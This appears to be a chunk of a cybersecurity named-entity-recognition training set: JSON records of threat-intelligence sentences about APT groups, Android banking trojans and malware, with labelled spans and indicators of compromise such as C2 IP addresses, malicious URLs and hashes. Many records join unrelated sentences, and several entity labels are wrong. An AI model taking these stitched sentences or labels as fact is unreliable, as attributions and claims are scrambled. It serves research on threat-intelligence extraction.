In addition to stealing 
keystrokes , Naikon also intercepted network traffic . Rancor : 199.247.6.253 . Note : The default log rotation configuration on NetScaler allows 25 files per log type ( e.g. , ns.log ) and 100 Kilobytes per log , therefore recording 2.5 megabytes in total .", "spans": {"THREAT_ACTOR: Naikon": [[364, 370]], "THREAT_ACTOR: Rancor": [[406, 412]], "IP_ADDRESS: 199.247.6.253": [[415, 428]]}, "info": {"id": "cyberner_stix_train_005437", "source": "cyberner_stix_train"}} {"text": "force the device ’ s back to the home screen getnpki : get files/content from the folder named NPKI ( contains certificates related to financial transactions ) http — access a specified network using HttpURLConnection onRecordAction — simulate a number-dialed tone call — call a specified number get_apps — get all the apps installed on the device show_fs_float_window — show a full-screen window for phishing Of note is XLoader ’ s abuse of the WebSocket protocol ( supported in many browsers Following US-CERTs report , Symantec's research uncovered the key component used in Lazarus's recent wave of financial attacks . Also , some code pieces are directly re-used in the", "spans": {"MALWARE: XLoader": [[421, 428]], "THREAT_ACTOR: Lazarus's": [[578, 587]], "ORGANIZATION: financial": [[603, 612]]}, "info": {"id": "cyberner_stix_train_005438", "source": "cyberner_stix_train"}} {"text": "There have been cases in the past where victims also downloaded malicious content from fake news websites .", "spans": {}, "info": {"id": "cyberner_stix_train_005439", "source": "cyberner_stix_train"}} {"text": "Dubbed ‘Operation Sheep’ , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . 
The installed EXE file is almost exactly the same as the DLL version of Bisonal variant used against the Russian organization .", "spans": {"THREAT_ACTOR: ‘Operation Sheep’": [[7, 24]], "VULNERABILITY: Man-in-the-Disk": [[123, 138]], "FILEPATH: installed EXE file": [[210, 228]], "TOOL: DLL": [[263, 266]], "FILEPATH: Bisonal variant": [[278, 293]]}, "info": {"id": "cyberner_stix_train_005440", "source": "cyberner_stix_train"}} {"text": "] infoal-amalhumandevelopment [ . In addition to the original \" Infy \" variant , we also see the newer , more sophisticated , interactive , and fuller-featured \" Infy M \" variant deployed against apparently-higher-value targets . The Domain Name System ( DNS ) is the phone book of the Internet . and % HiddenKey% as part of its persistence via the Windows registry.[6 ] OSX / Shlayer has used the mktemp utility to make random and unique filenames for payloads , such as export tmpDir=\"$(mktemp -d /tmp / XXXXXXXXXXXX ) \" or mktemp -t Installer .", "spans": {"TOOL: Infy": [[64, 68]], "TOOL: Infy M": [[162, 168]], "TOOL: OSX / Shlayer": [[371, 384]]}, "info": {"id": "cyberner_stix_train_005441", "source": "cyberner_stix_train"}} {"text": "Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations foreign governments . Only one client , based in Iran , continued to communicate with the infrastructure .", "spans": {"THREAT_ACTOR: APT32": [[22, 27]], "THREAT_ACTOR: OceanLotus Group": [[48, 64]], "ORGANIZATION: foreign corporations": [[80, 100]], "ORGANIZATION: governments": [[109, 120]]}, "info": {"id": "cyberner_stix_train_005442", "source": "cyberner_stix_train"}} {"text": "If users allow such apps to be installed , then it can be actively installed on the victim ’ s device . The simplest conclusion based on these facts is that APT1 is operating in China , and most likely in Shanghai . However, a variety of typical persistence mechanisms, such as a scheduled task, could serve that . 
CrowdStrike researchers replicated the exploit method attack on Exchange systems that had not received the November 8 , 2022 patch KB5019758 , but could not replicate the attack on systems that had received that patch .", "spans": {"THREAT_ACTOR: APT1": [[157, 161]], "THREAT_ACTOR: CrowdStrike researchers": [[315, 338]], "VULNERABILITY: KB5019758": [[446, 455]]}, "info": {"id": "cyberner_stix_train_005443", "source": "cyberner_stix_train"}} {"text": "] 122:28855 61 [ . In the latter case however , the Dukes group appear to have also simultaneously developed an entirely new loader , which we first observed being used in conjunction with CosmicDuke during the spring of 2015 . Also updated was the function name that is invoked , in the example below it was CJOJFNUWNQKRTLLTMCVDCKFGG , however this was dynamically changed to match the name of the function that would be present in pastebin file that was being downloaded . Evidence of malicious intent can come in many forms , here are just a few potential IoAs", "spans": {"THREAT_ACTOR: Dukes group": [[52, 63]], "TOOL: CosmicDuke": [[189, 199]]}, "info": {"id": "cyberner_stix_train_005444", "source": "cyberner_stix_train"}} {"text": "The attackers are also hijacking the device camera to take pictures . Primary targets for this adversary are in the government , aerospace , NGO , defense , cryptology and education sectors . The Svchost group registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost is opened and the netsvc group value data is queried to generate a name for the service . 
The findings , compiled together in the 2023 State of Ransomware Report , show alarming trends in the global ransomware surge from July 2022 to June 2023 .", "spans": {"ORGANIZATION: government": [[116, 126]], "ORGANIZATION: aerospace": [[129, 138]], "ORGANIZATION: NGO": [[141, 144]], "ORGANIZATION: defense": [[147, 154]], "ORGANIZATION: cryptology": [[157, 167]], "ORGANIZATION: education sectors": [[172, 189]], "TOOL: Svchost": [[196, 203]], "SYSTEM: HKLM\\SOFTWARE\\Microsoft\\Windows": [[223, 254]], "TOOL: netsvc": [[299, 305]], "ORGANIZATION: the 2023 State of Ransomware Report": [[407, 442]]}, "info": {"id": "cyberner_stix_train_005445", "source": "cyberner_stix_train"}} {"text": "This means it ’s not easy to scale—however , the malware provides a blueprint of how to target safety instrumented systems .", "spans": {}, "info": {"id": "cyberner_stix_train_005446", "source": "cyberner_stix_train"}} {"text": "Stealing SMS The Gxextsxms command is responsible for fetching all the SMS messages from the victim 's device and sending it over to the C & C server . In the case of the Buckeye exploit tool , the attackers exploited their own zero-day vulnerability (CVE-2019-0703) . Thrip is an espionage group that has targeted satellite communications ,telecoms ,and defense contractor companies in the U.S. 
and Southeast Asia .", "spans": {"TOOL: Buckeye exploit tool": [[171, 191]], "THREAT_ACTOR: Thrip": [[269, 274]]}, "info": {"id": "cyberner_stix_train_005447", "source": "cyberner_stix_train"}} {"text": "Both tools were deployed via RemCOM , an open-source replacement for PsExec available from GitHub .", "spans": {"ORGANIZATION: RemCOM": [[29, 35]], "TOOL: PsExec": [[69, 75]], "TOOL: GitHub": [[91, 97]]}, "info": {"id": "cyberner_stix_train_005448", "source": "cyberner_stix_train"}} {"text": "The headings of these documents included “ Ukraine ’s NATO Membership Action Plan ( MAP ) Debates ” , “ The Informal Asia-Europe Meeting ( ASEM ) Seminar on Human Rights ” , and “ Ukraine ’s Search for a Regional Foreign Policy ” .", "spans": {"ORGANIZATION: NATO": [[54, 58]]}, "info": {"id": "cyberner_stix_train_005449", "source": "cyberner_stix_train"}} {"text": "The vulnerability is bypassing most mitigations; however , as noted above , FireEye email and network products detect the malicious documents . For the sake of narrative we are going to focus exclusively to those samples we identified being used in attacks against Iranian civil society and diaspora .", "spans": {"ORGANIZATION: FireEye": [[76, 83]], "MALWARE: malicious documents": [[122, 141]], "ORGANIZATION: civil society": [[273, 286]], "ORGANIZATION: diaspora": [[291, 299]]}, "info": {"id": "cyberner_stix_train_005450", "source": "cyberner_stix_train"}} {"text": "FireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40 . 
Using data collected from the Trend Micro™ Smart Protection Network , we are able to identify victims whose networks communicated with Taidoor C&C servers .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: actor": [[155, 160]], "THREAT_ACTOR: APT40": [[169, 174]], "ORGANIZATION: Trend Micro™ Smart Protection Network": [[207, 244]], "MALWARE: Taidoor C&C servers": [[312, 331]]}, "info": {"id": "cyberner_stix_train_005451", "source": "cyberner_stix_train"}} {"text": "This is another reminder of why users shouldn ’ t rely on ratings alone to decide whether to trust an app . In fact , REDBALDKNIGHT has been zeroing in on Japanese organizations as early as 2008 — at least based on the file properties of the decoy documents they've been sending to their targets . in microcode . Evidence of compromise was observed within the JumpCloud agent log located at the file path /private / var / log / jcagent.log .", "spans": {"THREAT_ACTOR: REDBALDKNIGHT": [[118, 131]], "MALWARE: decoy documents": [[242, 257]]}, "info": {"id": "cyberner_stix_train_005452", "source": "cyberner_stix_train"}} {"text": "Of note , INDRIK SPIDER specifies the geographical location of where the victim should seek help , confirming that they know key information about the victim . Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[10, 23]], "VULNERABILITY: zero-day": [[188, 196]], "TOOL: Flash": [[214, 219]]}, "info": {"id": "cyberner_stix_train_005453", "source": "cyberner_stix_train"}} {"text": "Cisco Talos has identified the latest attempt to penetrate mobile devices — a new Android trojan that we have dubbed \" GPlayed . Based on the Let’s Encrypt certificate issuance date , we believe this campaign to be active from May 2019 . 
The generalized targeting of organizations involved in energy and petrochemicals mirrors previously observed targeting by other suspected Iranian threat groups , indicating a common interest in the sectors across Iranian actors .", "spans": {"ORGANIZATION: Cisco Talos": [[0, 11]], "SYSTEM: Android": [[82, 89]], "MALWARE: GPlayed": [[119, 126]], "ORGANIZATION: Encrypt": [[148, 155]], "ORGANIZATION: energy": [[293, 299]], "ORGANIZATION: petrochemicals": [[304, 318]], "THREAT_ACTOR: threat groups": [[384, 397]], "THREAT_ACTOR: actors": [[459, 465]]}, "info": {"id": "cyberner_stix_train_005454", "source": "cyberner_stix_train"}} {"text": "Firstly , some of the MiniDuke components were written in Assembly language .", "spans": {"MALWARE: MiniDuke": [[22, 30]], "TOOL: Assembly": [[58, 66]]}, "info": {"id": "cyberner_stix_train_005455", "source": "cyberner_stix_train"}} {"text": "We reported it to Google on May 16 , 2020 and since May 19 , 2020 the app has no longer been available on Google Play . In April 2018 , SWEED began making use of a previously disclosed Office exploit . For example , DeltaAlfa specifies a DDoS bot family identified as Alfa .", "spans": {"ORGANIZATION: Google": [[18, 24]], "SYSTEM: Google Play": [[106, 117]], "THREAT_ACTOR: SWEED": [[136, 141]], "FILEPATH: DeltaAlfa": [[216, 225]], "MALWARE: DDoS bot": [[238, 246]]}, "info": {"id": "cyberner_stix_train_005456", "source": "cyberner_stix_train"}} {"text": "Historically , the majority of their targeting has been focused on the South Korean government , military , and defense industrial base . 
Once the LOWBALL malware calls back to the Dropbox account , the admin@338 will create a file called upload.bat which contains commands to be executed on the compromised computer .", "spans": {"ORGANIZATION: South Korean government": [[71, 94]], "ORGANIZATION: military": [[97, 105]], "ORGANIZATION: defense": [[112, 119]], "MALWARE: LOWBALL": [[147, 154]], "MALWARE: malware": [[155, 162]], "TOOL: Dropbox": [[181, 188]], "THREAT_ACTOR: admin@338": [[203, 212]], "FILEPATH: upload.bat": [[239, 249]]}, "info": {"id": "cyberner_stix_train_005457", "source": "cyberner_stix_train"}} {"text": "Unit 42 assesses with high confidence that both the IP address 185.25.50.189 and the domain domforworld.com is associated with WINDSHIFT activity . If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "MALWARE: Carbanak": [[180, 188]], "VULNERABILITY: exploit": [[201, 208]], "SYSTEM: Windows": [[234, 241], [247, 254], [269, 276], [285, 292], [307, 314], [319, 326], [335, 342]], "VULNERABILITY: CVE-2013-3660": [[357, 370]]}, "info": {"id": "cyberner_stix_train_005458", "source": "cyberner_stix_train"}} {"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . 
Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: specific individuals": [[83, 103]], "VULNERABILITY: zero-day exploits": [[144, 161]], "THREAT_ACTOR: The Lamberts": [[248, 260]], "ORGANIZATION: ITSec community": [[300, 315]], "ORGANIZATION: FireEye": [[351, 358]], "VULNERABILITY: zero day": [[388, 396]], "VULNERABILITY: vulnerability": [[397, 410]], "VULNERABILITY: CVE-2014-4148": [[413, 426]]}, "info": {"id": "cyberner_stix_train_005459", "source": "cyberner_stix_train"}} {"text": "Indicators of Compromise ( IoCs ) Package Name Hash ESET detection name com.secure.protect.world F17AEBC741957AA21CFE7C7D7BAEC0900E863F61 Android/Spy.BanBra.A com.brazil.android.free EA069A5C96DC1DB0715923EB68192FD325F3D3CE Android/Spy.BanBra.A MITRE ATT & CK techniques Tactic ID Name Description Initial Access T1475 Deliver Malicious App These three recent Waterbug campaigns have seen the group compromise governments and international organizations across the globe in addition to targets in the IT and education sectors . 
This new variant resembles parts of the Destover malware , which was used in the 2014 Sony Pictures attack .", "spans": {"ORGANIZATION: ESET": [[52, 56]], "ORGANIZATION: MITRE": [[245, 250]], "THREAT_ACTOR: Waterbug": [[360, 368]], "THREAT_ACTOR: group": [[393, 398]], "ORGANIZATION: compromise governments": [[399, 421]], "ORGANIZATION: international organizations": [[426, 453]], "ORGANIZATION: IT": [[501, 503]], "ORGANIZATION: education sectors": [[508, 525]], "MALWARE: Destover": [[568, 576]], "MALWARE: malware": [[577, 584]]}, "info": {"id": "cyberner_stix_train_005460", "source": "cyberner_stix_train"}} {"text": "Both the British and Dutch governments have publicly attributed SNAKEMACKEREL activities to the Russian military intelligence service ( RIS ) and have linked specific cyberattacks to the group , including the targeting of the Organisation for the Prohibition of Chemical Weapons ( OPCW ) , the United Kingdom Defence and Science Technology Laboratory ( DSTL ) and the United Kingdom Foreign and Commonwealth Office ( FCO ) .", "spans": {"THREAT_ACTOR: SNAKEMACKEREL": [[64, 77]], "ORGANIZATION: Russian military intelligence service": [[96, 133]], "ORGANIZATION: RIS": [[136, 139]], "ORGANIZATION: Organisation for the Prohibition of Chemical Weapons": [[226, 278]], "ORGANIZATION: OPCW": [[281, 285]], "ORGANIZATION: United Kingdom Defence and Science Technology Laboratory": [[294, 350]], "ORGANIZATION: DSTL": [[353, 357]], "ORGANIZATION: United Kingdom Foreign and Commonwealth Office": [[368, 414]], "ORGANIZATION: FCO": [[417, 420]]}, "info": {"id": "cyberner_stix_train_005461", "source": "cyberner_stix_train"}} {"text": "com.lcode.apgvb com.fact.jib mn.egolomt.bank com.pnbrewardz com.firstbank.firstmobile wit.android.bcpBankingApp.millenniumPL com.grppl.android.shell.halifax com.revolut.revolut de.commerzbanking.mobil uk.co.santander.santanderUK se.nordea.mobilebank com.snapwork.hdfc com.csam.icici.bank.imobile com.msf.kbank.mobile More details about the cloak 
and dagger games between Naikon and Hellsing can be found in our blogpost : \" The Chronicles of the Hellsing APT : The Empire Strikes Back \" . The most used malware implant is dubbed Pteranodon or Pterodo and consists of a multistage backdoor designed to collect sensitive information or maintaining access on compromised machines . Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": {"THREAT_ACTOR: Naikon": [[371, 377]], "THREAT_ACTOR: Hellsing": [[382, 390]], "THREAT_ACTOR: Hellsing APT": [[446, 458]], "TOOL: Empire Strikes Back": [[465, 484]], "MALWARE: Pteranodon": [[529, 539]], "MALWARE: Pterodo": [[543, 550]], "MALWARE: backdoor": [[580, 588]], "ORGANIZATION: Talos researchers": [[679, 696]], "TOOL: Open Babel": [[745, 755]]}, "info": {"id": "cyberner_stix_train_005462", "source": "cyberner_stix_train"}} {"text": "Keylogging : record input events by hooking IPCThreadState : :Transact from /system/lib/libbinder.so , and intercepting android : :parcel with the interface com.android.internal.view.IInputContext . Since early 2018 , FireEye ( including our FireEye as a Service ( FaaS ) , Mandiant Consulting , and iSIGHT Intelligence teams ) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities , especially those connected to South China Sea issues . Winnti : 8272c1f4 2018-11-01 13:16:24 https://nw.infestexe.com/version/last.php . 
The Platform can look for indicators across file attachments , embedded links , and more and provide inplatform risk scoring .", "spans": {"ORGANIZATION: FireEye": [[218, 225], [242, 249]], "ORGANIZATION: Mandiant Consulting": [[274, 293]], "ORGANIZATION: iSIGHT Intelligence": [[300, 319]], "ORGANIZATION: engineering": [[386, 397]], "ORGANIZATION: maritime entities": [[402, 419]], "THREAT_ACTOR: Winnti": [[477, 483]], "URL: https://nw.infestexe.com/version/last.php": [[515, 556]], "TOOL: The Platform": [[559, 571]]}, "info": {"id": "cyberner_stix_train_005463", "source": "cyberner_stix_train"}} {"text": "However , the OwaAuth web shell password contains the victim organization's name .", "spans": {"MALWARE: OwaAuth": [[14, 21]], "TOOL: web shell": [[22, 31]]}, "info": {"id": "cyberner_stix_train_005464", "source": "cyberner_stix_train"}} {"text": "While not too seriously , these elements made us restrict our research into surveillance companies from the region . Ongoing activity from attack groups like TA459 who consistently target individuals specializing in particular areas of research and expertise further complicate an already difficult security situation for organizations dealing with more traditional malware threats , phishing campaigns , and socially engineered threats every day . http://linda-callaghan.icu/Minkowski/brown . 
Check the memory size with to check if it is less than 2 GB .", "spans": {"THREAT_ACTOR: TA459": [[158, 163]], "URL: http://linda-callaghan.icu/Minkowski/brown": [[449, 491]]}, "info": {"id": "cyberner_stix_train_005465", "source": "cyberner_stix_train"}} {"text": "Targeting profiles , spearphish filenames , and lures carry thematic content related to visa applications and scanned images , border control administration , and various administrative notes .", "spans": {}, "info": {"id": "cyberner_stix_train_005466", "source": "cyberner_stix_train"}} {"text": "Examining the use of the unique user agents ’ strings over time shows that while previously only the Mozilla user agent was in use , since mid 2017 all three user agent strings have been used by the Zebrocy tool for its C2 communications .", "spans": {"ORGANIZATION: Mozilla": [[101, 108]], "MALWARE: Zebrocy": [[199, 206]], "TOOL: C2": [[220, 222]]}, "info": {"id": "cyberner_stix_train_005467", "source": "cyberner_stix_train"}} {"text": "Bread apps frequently contain no functionality beyond the billing process or simply clone content from other popular apps . Using the information gathered from its reconnaissance on social media sites , Barium packages the phishing e-mail in a way that gives the e-mail credibility to the target user , often by making the e-mail appear as ifit were sent from an organization known to and trusted by the victim or concerning a topic of interest to the victim . The encrypted IP address is “ 127.0.0.2 ” ( used as loopback ) and no connection is made on that IP address ( due to the listening variable set to 1 ) . 
Zarya ’s Telegram channel was created in March 2022 , although the group ’s alleged leader claimed that elements of Zarya existed well before this , and were previously known by various names including “ 0x000000 ” and “ Quarantine ” ( Russian : Карантин ) .", "spans": {"MALWARE: Bread": [[0, 5]], "ORGANIZATION: social media": [[182, 194]], "THREAT_ACTOR: Barium": [[203, 209]], "IP_ADDRESS: 127.0.0.2": [[491, 500]], "THREAT_ACTOR: Zarya": [[730, 735]], "THREAT_ACTOR: 0x000000": [[818, 826]], "THREAT_ACTOR: Quarantine": [[835, 845]], "THREAT_ACTOR: Russian : Карантин": [[850, 868]]}, "info": {"id": "cyberner_stix_train_005468", "source": "cyberner_stix_train"}} {"text": "CTU researchers recommend that organizations apply controls to mitigate common intrusion techniques and behaviors along with controls that address the tools and techniques discussed in this analysis .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_005469", "source": "cyberner_stix_train"}} {"text": "This ‘ versatility ’ was present in the first version of Rotexy and has been a feature of all the family ’ s subsequent representatives . More recently , in May 2017 , APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company . Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government - referred to by the U.S. Government as BADCALL .", "spans": {"MALWARE: Rotexy": [[57, 63]], "THREAT_ACTOR: APT33": [[168, 173]], "ORGANIZATION: organization": [[201, 213]], "ORGANIZATION: business conglomerate": [[233, 254]], "MALWARE: malicious file": [[263, 277]], "ORGANIZATION: petrochemical company": [[350, 371]], "ORGANIZATION: U.S. 
Government": [[387, 402], [518, 533]], "ORGANIZATION: DHS": [[414, 417]], "ORGANIZATION: FBI": [[422, 425]], "MALWARE: Trojan": [[437, 443]], "MALWARE: malware": [[444, 451]]}, "info": {"id": "cyberner_stix_train_005470", "source": "cyberner_stix_train"}} {"text": "] zqo-japan [ . APT1 were a highly prolific cyber-attack group operating out of China . The methods employed by Glimpse to perform DNS communications are determined by the mode in which it is operating (i.e., text mode or ping ) . Although this wave did not use any zero day exploits , it relied on steganography and NTFS alternate data streams to complicate detection .", "spans": {"THREAT_ACTOR: APT1": [[16, 20]], "THREAT_ACTOR: cyber-attack group": [[44, 62]], "MALWARE: Glimpse": [[112, 119]]}, "info": {"id": "cyberner_stix_train_005471", "source": "cyberner_stix_train"}} {"text": "TG-3390 : 66.63.178.142 .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "IP_ADDRESS: 66.63.178.142": [[10, 23]]}, "info": {"id": "cyberner_stix_train_005472", "source": "cyberner_stix_train"}} {"text": "Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1) , and executing it using ShellExecute() . This migration activity was last observed in October 2016 .", "spans": {"VULNERABILITY: CVE-2017-10271": [[110, 124]], "TOOL: PowerShell": [[138, 148]]}, "info": {"id": "cyberner_stix_train_005473", "source": "cyberner_stix_train"}} {"text": "This hexadecimal string will most likely be a string of shellcode that will contain and decrypt the ultimate portable executable ( PE ) payload .", "spans": {"TOOL: portable executable": [[109, 128]], "TOOL: PE": [[131, 133]]}, "info": {"id": "cyberner_stix_train_005474", "source": "cyberner_stix_train"}} {"text": "In 2013 , Kaspersky Lab mobile products prevented 2,500 infections by banking Trojans . 
Cybersecurity researchers have uncovered an espionage campaign that has targeted a national data center of an unnamed central Asian country in order to conduct watering hole attacks . Even though the bill was withdrawn in October 2019 , protests continued , demanding full democracy and investigation of the Hong Kong police . STRATOFEAR contains an embedded configuration that includes two file paths .", "spans": {"ORGANIZATION: Kaspersky Lab": [[10, 23]], "ORGANIZATION: Cybersecurity": [[88, 101]], "MALWARE: STRATOFEAR": [[415, 425]]}, "info": {"id": "cyberner_stix_train_005475", "source": "cyberner_stix_train"}} {"text": "The compiled version with the least detections was later re-tested in 2017 and deployed less than a week later during TEMP.Veles activities in the target environment .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[118, 128]]}, "info": {"id": "cyberner_stix_train_005476", "source": "cyberner_stix_train"}} {"text": "Attribution is always a difficult question , but attempting to answer it is important in understanding these types of threats and how to defend against them .", "spans": {}, "info": {"id": "cyberner_stix_train_005477", "source": "cyberner_stix_train"}} {"text": "This malware abuses the Android accessibility feature to steal user information and is able to update its code and release new features every few days . The Magnitude EK landing page consisted of CVE-2016-0189 , which was first reported by FireEye as being used in Neutrino Exploit Kit after it was patched . 
APT10 has been in operation since at least 2009 , and has evolved its targeting from an early focus on the US defence industrial base ( DIB )1 and the technology and telecommunications sector , to a widespread compromise of multiple industries and sectors across the globe , most recently with a focus on MSPs .", "spans": {"SYSTEM: Android": [[24, 31]], "TOOL: Magnitude EK": [[157, 169]], "VULNERABILITY: CVE-2016-0189": [[196, 209]], "ORGANIZATION: FireEye": [[240, 247]], "TOOL: Neutrino Exploit Kit": [[265, 285]], "THREAT_ACTOR: APT10": [[309, 314]], "ORGANIZATION: technology": [[460, 470]], "ORGANIZATION: telecommunications sector": [[475, 500]], "ORGANIZATION: MSPs": [[614, 618]]}, "info": {"id": "cyberner_stix_train_005478", "source": "cyberner_stix_train"}} {"text": "Still , US-based infected phones total almost 287,000 . The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April . APT33 : 64.251.19.231 mynetwork.ddns.net . The goal of UNC1945 is currently unknown because Mandiant has not been able to observe the activities that followed UNC1945 compromises .", "spans": {"VULNERABILITY: SMBv1 exploit": [[78, 91]], "THREAT_ACTOR: Shadow Brokers": [[135, 149]], "THREAT_ACTOR: threat group": [[150, 162]], "THREAT_ACTOR: APT33": [[174, 179]], "IP_ADDRESS: 64.251.19.231": [[182, 195]], "DOMAIN: mynetwork.ddns.net": [[196, 214]], "THREAT_ACTOR: UNC1945": [[229, 236], [333, 340]], "ORGANIZATION: Mandiant": [[266, 274]]}, "info": {"id": "cyberner_stix_train_005479", "source": "cyberner_stix_train"}} {"text": "Embedding malicious code in legitimate programs helps conceal infections from the victim . By using such features and tools , attackers are hoping to blend in on the victim 's network and hide their activity in a sea of legitimate processes . From the module itself we can also extract the name the developer gave to the module . 
Sandworm utilized a novel technique to impact the OT environment by executing code within an End - of - Life ( EOL ) MicroSCADA control system and issuing commands that impacted the victim ’s connected substations .", "spans": {"THREAT_ACTOR: Sandworm": [[330, 338]]}, "info": {"id": "cyberner_stix_train_005480", "source": "cyberner_stix_train"}} {"text": "But such frameworks also increase attackers' detection surface , that is , their susceptibility to discovery .", "spans": {}, "info": {"id": "cyberner_stix_train_005481", "source": "cyberner_stix_train"}} {"text": "In February , FireEye identified CORESHELL traffic beaconing from TV5Monde ’s network , confirming that APT28 had compromised TV5Monde ’s network .", "spans": {"ORGANIZATION: FireEye": [[14, 21]], "TOOL: CORESHELL": [[33, 42]], "ORGANIZATION: TV5Monde": [[66, 74], [126, 134]], "THREAT_ACTOR: APT28": [[104, 109]]}, "info": {"id": "cyberner_stix_train_005482", "source": "cyberner_stix_train"}} {"text": "This information can help organizations make strategic defensive decisions in relation to the BRONZE PRESIDENT threat group .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[94, 110]]}, "info": {"id": "cyberner_stix_train_005483", "source": "cyberner_stix_train"}} {"text": "The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . 
e uncovered the activity of a hacking group which has Chinese origins .", "spans": {"THREAT_ACTOR: hacker group": [[19, 31]], "THREAT_ACTOR: BlackOasis": [[60, 70]], "ORGANIZATION: Kaspersky": [[73, 82]], "THREAT_ACTOR: group": [[93, 98]], "VULNERABILITY: Adobe Flash Player zero-day vulnerability": [[116, 157]], "VULNERABILITY: CVE-2016-4117": [[160, 173]], "TOOL: FinSpy": [[220, 226]]}, "info": {"id": "cyberner_stix_train_005484", "source": "cyberner_stix_train"}} {"text": "The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc . The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 .", "spans": {"MALWARE: RAT": [[4, 7]], "FILEPATH: sample": [[323, 329]], "VULNERABILITY: CVE-2017-11882": [[349, 363]], "VULNERABILITY: CVE-2018-0802": [[367, 380]]}, "info": {"id": "cyberner_stix_train_005485", "source": "cyberner_stix_train"}} {"text": "Appendix Samples Some of the latest Ginp samples found in the wild : App name Package name SHA-256 hash Google Play Verificator sing.guide.false 0ee075219a2dfde018f17561467272633821d19420c08cba14322cc3b93bb5d5 Google Play Verificator park.rather.dance 087a3beea46f3d45649b7506073ef51c784036629ca78601a4593759b253d1b7 Adobe Flash Player ethics.unknown.during APT10 used this approach to deploy UPPERCUT when targeting Japanese corporations in July 2018 . 
HomamDownloader is a small downloader program with minimal interesting characteristics from a technical point of view .", "spans": {"MALWARE: Ginp": [[36, 40]], "SYSTEM: Google Play Verificator": [[104, 127], [210, 233]], "SYSTEM: park.rather.dance": [[234, 251]], "SYSTEM: Adobe Flash Player": [[317, 335]], "THREAT_ACTOR: APT10": [[358, 363]], "TOOL: UPPERCUT": [[393, 401]], "ORGANIZATION: Japanese corporations": [[417, 438]], "MALWARE: HomamDownloader": [[454, 469]]}, "info": {"id": "cyberner_stix_train_005486", "source": "cyberner_stix_train"}} {"text": "Both of these types of fraud take advantage of mobile billing techniques involving the user ’ s carrier . In the past they used Adobe Gh0st , Poison Ivy and Torn RAT malware as their primary attack vector is sphere phishing . Here is the list of common commands : Methods for doing that include built - in functionality of malware or by using utilities present on the system .", "spans": {"TOOL: Adobe Gh0st": [[128, 139]], "TOOL: Poison Ivy": [[142, 152]], "TOOL: Torn RAT malware": [[157, 173]], "MALWARE: malware": [[323, 330]]}, "info": {"id": "cyberner_stix_train_005487", "source": "cyberner_stix_train"}} {"text": "These URLs are all in the form of “ http : // $ C2. $ SERVER. $ IP/api/ ? The email address edmundj@chmail.ir and the geolocation of Tehran , Iran , being of note . Gamaredon : def13f94cdf793df3e9b42b168550a09ee906f07f61a3f5c9d25ceca44e8068c . 
Although the primary target is believed to have been the Ukrainian military , other customers were affected , including personal and commercial internet users .", "spans": {"THREAT_ACTOR: Gamaredon": [[165, 174]], "FILEPATH: def13f94cdf793df3e9b42b168550a09ee906f07f61a3f5c9d25ceca44e8068c": [[177, 241]], "ORGANIZATION: the Ukrainian military": [[297, 319]], "ORGANIZATION: personal and commercial internet users": [[364, 402]]}, "info": {"id": "cyberner_stix_train_005488", "source": "cyberner_stix_train"}} {"text": "The Dukes have consistently operated large-scale campaigns against high-profile targets while concurrently engaging in smaller , more targeted campaigns with apparent coordination and no evidence of unintentional overlap or operational clashes .", "spans": {"THREAT_ACTOR: Dukes": [[4, 9]]}, "info": {"id": "cyberner_stix_train_005489", "source": "cyberner_stix_train"}} {"text": "Like all of Microsoft ’ s security solutions , these new capabilities are likewise backed by a global network of threat researchers and security experts whose deep understanding of the threat landscape guide the continuous innovation of security features and ensure that customers are protected from ever-evolving threats . The crew combines both regular crime and targeted attack objectives using the same domain infrastructure over time , rarely changing their TTPs . The code is able to deobfuscate 34 of 38 functions ( 89% ) In recent years , healthcare providers are increasingly being targeted with coordinated , sophisticated Phishing and Business Email Compromise BEC campaigns .", "spans": {"ORGANIZATION: Microsoft": [[12, 21]], "TOOL: domain infrastructure": [[407, 428]], "ORGANIZATION: healthcare providers": [[547, 567]]}, "info": {"id": "cyberner_stix_train_005490", "source": "cyberner_stix_train"}} {"text": "This configuration can be toggled on by going to ‘ Settings ’ - > ‘ Security ’ - > ‘ Unknown Resources ’ . 
